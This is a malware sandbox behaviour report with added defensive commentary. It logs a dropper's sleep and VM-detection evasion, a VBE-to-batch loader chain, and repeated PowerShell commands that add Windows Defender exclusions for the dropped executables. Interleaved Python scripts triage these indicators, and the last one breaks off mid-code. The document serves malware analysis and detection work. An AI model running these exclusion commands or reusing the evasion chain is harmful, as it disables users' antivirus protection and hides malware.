Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\uAsLgsGzSk.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\uAsLgsGzSk.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0090A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0090A69B
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0091C220
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091E6A3 VirtualQuery,GetSystemInfo,0_2_0091E6A3
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\uAsLgsGzSk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\uAsLgsGzSk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 30000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 600000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 599891
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 599766
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 3600000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 598903
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 598266
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 597516
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 596985
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 596782
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 596625
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 596422
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 596266
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 596032
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 595844
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 595593
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 595369
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 595078
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 594891
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 594625
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 594360
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 594063
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 593860
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 593625
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 593328
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 593094
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 592750
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 592547
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 592094
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 591735
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 591504
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 591219
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 590953
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 590641
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 590203
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 589953
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 589516
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 589000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 588782
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 588407
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 588059
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 587597
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 587235
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 586925
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 586752
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 586547
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 586384
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 586219
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 300000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 586051
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 585885
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 585719
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 585532
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 585356
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 585192
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 585047
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 584875
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 584688
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 584485
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 584321
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 584150
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 584000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 583846
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 583684
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 583573
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 583438
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 583282
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 583146
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 583015
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 582905
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 582797
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 582687
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 582578
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 582461
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582348
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582091
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581966
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581859
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581749
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581641
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581531
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581422
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581313
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581203
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580969
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580860
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580735
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580625
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580516
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580391
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580272
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580103
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579997
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579884
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579779
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579672
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579563
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579453
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579324
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578983
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578874
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578766
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578641
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578529
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\AppData
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\AppData\Local
Source: serverBrokerperfMonitor.exe, 00000005.00000002.1958938627.000000001CE34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yU
Source: w32tm.exe, 00000026.00000002.1950605264.000001E1A95D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: wscript.exe, 00000001.00000003.1828389187.0000000000923000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: serverBrokerperfMonitor.exe, 00000005.00000002.1952160160.000000001BE59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: hz7DzW2Yop.exe, 00000000.00000003.1672432196.0000000000802000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{v"
Source: serverBrokerperfMonitor.exe, 00000005.00000002.1958938627.000000001CE34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: serverBrokerperfMonitor.exe, 00000005.00000002.1958938627.000000001CE34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}DD
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | API call chain: ExitProcess graph end node | graph_0-23967
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_0091F838
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_00927DEE mov eax, dword ptr fs:[00000030h] | 0_2_00927DEE
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0092C030 GetProcessHeap | 0_2_0092C030
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Recovery\uAsLgsGzSk.exe | Process token adjusted: Debug
Source: C:\Recovery\uAsLgsGzSk.exe | Process token adjusted: Debug
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_0091F838
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091F9D5 SetUnhandledExceptionFilter | 0_2_0091F9D5
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_0091FBCA
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_00928EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00928EBD
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Memory allocated: page read and write | page guard
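
The thread-delay run and the hypervisor device strings above are the two sandbox-evasion signals an analyst triages first: cumulative sleeps that outlast the analysis window, and VMware or Hyper-V identifiers a sample could compare against. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It parses entries in the "Source: <process> | <event>" shape used on this page, totals the delays and rates each vendor string; the sample lines are constructed from entries shown above. Two caveats are built in: the delay unit and the 60 000 threshold are assumptions (the report does not state a unit here), and "Hyper-V RAW" is the AF_HYPERV Winsock provider name shipped in mswsock.dll on physical Windows 10 hosts as well, so it is only rated weak. A VMware device ID in a process memory dump shows what hardware the guest exposes to every process, not by itself that the sample compared it.

```python
"""Triage of sandbox-evasion indicators from behaviour-log lines.

Added example, not part of the Joe Sandbox report. Entries are expected in the
"Source: <process> | <event>" shape used on this page; the sample lines are
constructed from entries shown above.
"""
import re

ENTRY_RE = re.compile(r"^Source:\s*(.+?)\s*\|\s*(.+)$")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")
MEMSTR_RE = re.compile(r"Binary or memory string:\s*(.*)$")

# Vendor fingerprints as they appear in device IDs, driver names and Winsock
# provider names. "Hyper-V RAW" is the AF_HYPERV provider from mswsock.dll and
# is present on every Windows 10 install, physical or virtual, so it is only a
# weak signal; the others name hardware that only a guest would expose.
VM_INDICATORS = [
    ("VMware", re.compile(r"vmware|vmwar", re.I), "strong"),
    ("VirtualBox", re.compile(r"vbox|virtualbox", re.I), "strong"),
    ("QEMU", re.compile(r"qemu", re.I), "strong"),
    ("Hyper-V", re.compile(r"hyper-v|vmbus", re.I), "weak"),
]

# Cumulative delay above which the sleep pattern counts as evasion. The unit is
# whatever the sandbox reports; milliseconds is an assumption made here.
SLEEP_THRESHOLD = 60_000

# Constructed sample, values modelled on the entries above.
SAMPLE_LOG = r"""
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 588059
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 586219
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 300000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Thread delayed: delay time: 578529
Source: serverBrokerperfMonitor.exe, 00000005.00000002.1958938627.000000001CE34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: w32tm.exe, 00000026.00000002.1950605264.000001E1A95D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process token adjusted: Debug
"""


def parse_entries(text):
    """Return (source, event) pairs; lines that do not fit the shape are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append((m.group(1), m.group(2)))
    return entries


def summarize_delays(entries):
    """Count and bound the 'Thread delayed' events."""
    delays = []
    for _, event in entries:
        m = DELAY_RE.search(event)
        if m:
            delays.append(int(m.group(1)))
    if not delays:
        return {"count": 0, "min": None, "max": None, "total": 0}
    return {"count": len(delays), "min": min(delays), "max": max(delays), "total": sum(delays)}


def find_vm_artifacts(entries):
    """Flag memory strings that name a hypervisor vendor, with a strength rating."""
    hits = []
    for source, event in entries:
        m = MEMSTR_RE.search(event)
        if not m:
            continue
        for vendor, pattern, strength in VM_INDICATORS:
            if pattern.search(m.group(1)):
                hits.append({"source": source, "vendor": vendor,
                             "strength": strength, "evidence": m.group(1)})
    return hits


def assess(entries):
    """Roll both indicator types into a triage verdict."""
    delays = summarize_delays(entries)
    vm = find_vm_artifacts(entries)
    return {
        "sleep_evasion": delays["total"] >= SLEEP_THRESHOLD,
        "strong_vm_artifact": any(h["strength"] == "strong" for h in vm),
        "weak_vm_artifact": any(h["strength"] == "weak" for h in vm),
        "delays": delays,
        "vm_artifacts": vm,
    }


if __name__ == "__main__":
    verdict = assess(parse_entries(SAMPLE_LOG))
    print(f"sleep evasion: {verdict['sleep_evasion']} {verdict['delays']}")
    for hit in verdict["vm_artifacts"]:
        print(f"{hit['strength']:>6}  {hit['vendor']:<10} in {hit['source']}")
```

Run against the full report text (after splitting on the "Source:" cells), the delay summary is what tells you whether the sample simply waited out the analysis window; the strong/weak split keeps the ubiquitous Hyper-V provider string from being mistaken for a real virtualisation check.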

                                    HIPS / PFW / Operating System Protection Evasion

Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\HyperWebbroker\serverBrokerperfMonitor.exe "C:\HyperWebbroker/serverBrokerperfMonitor.exe"
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\ShellExperiences\uAsLgsGzSk.exe "C:\Windows\ShellExperiences\uAsLgsGzSk.exe"
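
The chain above (wscript.exe running the .vbe, cmd.exe running the .bat, serverBrokerperfMonitor.exe spawning powershell Add-MpPreference for each drop location, then a second batch file that runs chcp 65001 and w32tm before starting the dropped uAsLgsGzSk.exe) is what a detection should tie together rather than alert on piecewise. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It parses "Source: <parent> | Process created: <image> <command line>" entries, extracts Defender exclusions from plain and -EncodedCommand PowerShell (the encoded line is constructed here to match the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma hit listed for this sample), recognises the w32tm /stripchart sleep that batch loaders use in place of a sleep command, and reports any process later started from an excluded path. The sample lines are constructed from the process chain above; the w32tm duration estimate, period * (samples - 1) seconds, is an approximation.

```python
"""Detect Defender-exclusion tampering and batch-file sleeps in process-creation
entries of the "Source: <parent> | Process created: <image> <cmdline>" shape.
Added example, not part of the Joe Sandbox report; sample lines are constructed
from the process chain above plus one -EncodedCommand variant built here."""
import base64
import re

EVENT_RE = re.compile(
    r"^Source:\s*(.+?)\s*\|\s*Process created:\s*(\S+?\.(?:exe|com))(?=\s|$)\s*(.*)$", re.I)
# powershell -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Add-MpPreference / Set-MpPreference adding a path, process or extension exclusion
EXCL_RE = re.compile(
    r"""(?:Add|Set)-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+"""
    r"""(?:'([^']*)'|"([^"]*)"|(\S+))""", re.I)


def _encode_command(script):
    """Encode a script the way powershell -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


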